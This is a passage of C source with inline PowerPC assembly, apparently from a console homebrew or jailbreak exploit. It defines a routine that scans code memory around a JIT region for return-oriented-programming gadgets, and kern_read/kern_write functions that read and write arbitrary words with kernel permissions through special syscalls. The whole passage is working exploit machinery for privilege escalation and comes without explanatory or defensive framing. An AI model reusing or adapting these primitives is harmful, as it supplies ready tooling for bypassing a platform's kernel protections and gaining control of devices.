    uint32_t i;
    for (i = 0; i < length; i++)
    {
        if (check1[i] != check2[i]) return 1;
    }

    return 0;
}

void* memcpy(void* dst, const void* src, uint32_t size)
{
    uint32_t i;
    for (i = 0; i < size; i++)
        ((uint8_t*) dst)[i] = ((const uint8_t*) src)[i];
    return dst;
}

/* Find a gadget based on a sequence of words */
void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_start)
{
    uint32_t *ptr;

    /* Search code before JIT area first */
    for (ptr = (uint32_t*) gadgets_start; ptr != (uint32_t*) JIT_ADDRESS; ptr++)
    {
        if (!memcmp(ptr, &code[0], length)) return ptr;
    }

    /* Restart search after JIT */
    for (ptr = (uint32_t*) CODE_ADDRESS_START; ptr != (uint32_t*) CODE_ADDRESS_END; ptr++)
    {
        if (!memcmp(ptr, &code[0], length)) return ptr;
    }

    OSFatal("Gadget not found!");
    return (void*)0;
}

/* Read a 32-bit word with kernel permissions */
uint32_t __attribute__ ((noinline)) kern_read(const void *addr)
{
    uint32_t result;
    asm volatile (
        "li 3,1\n"
        "li 4,0\n"
        "li 5,0\n"
        "li 6,0\n"
        "li 7,0\n"
        "lis 8,1\n"
        "mr 9,%1\n"
        "li 0,0x3400\n"
        "mr %0,1\n"
        "sc\n"
        "nop\n"
        "mr 1,%0\n"
        "mr %0,3\n"
        :	"=r"(result)
        :	"b"(addr)
        :	"memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10",
            "11", "12"
    );

    return result;
}

/* Write a 32-bit word with kernel permissions */
void __attribute__ ((noinline)) kern_write(void *addr, uint32_t value)
{
    asm volatile (
        "li 3,1\n"
        "li 4,0\n"
        "mr 5,%1\n"
        "li 6,0\n"
        "li 7,0\n"
        "lis 8,1\n"
        "mr 9,%0\n"
        "mr %1,1\n"
        "li 0,0x3500\n"
        "sc\n"
        "nop\n"
        "mr 1,%1\n"
        :
        :	"r"(addr), "r"(value)
        :	"memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10",
            "11", "12"
        );
}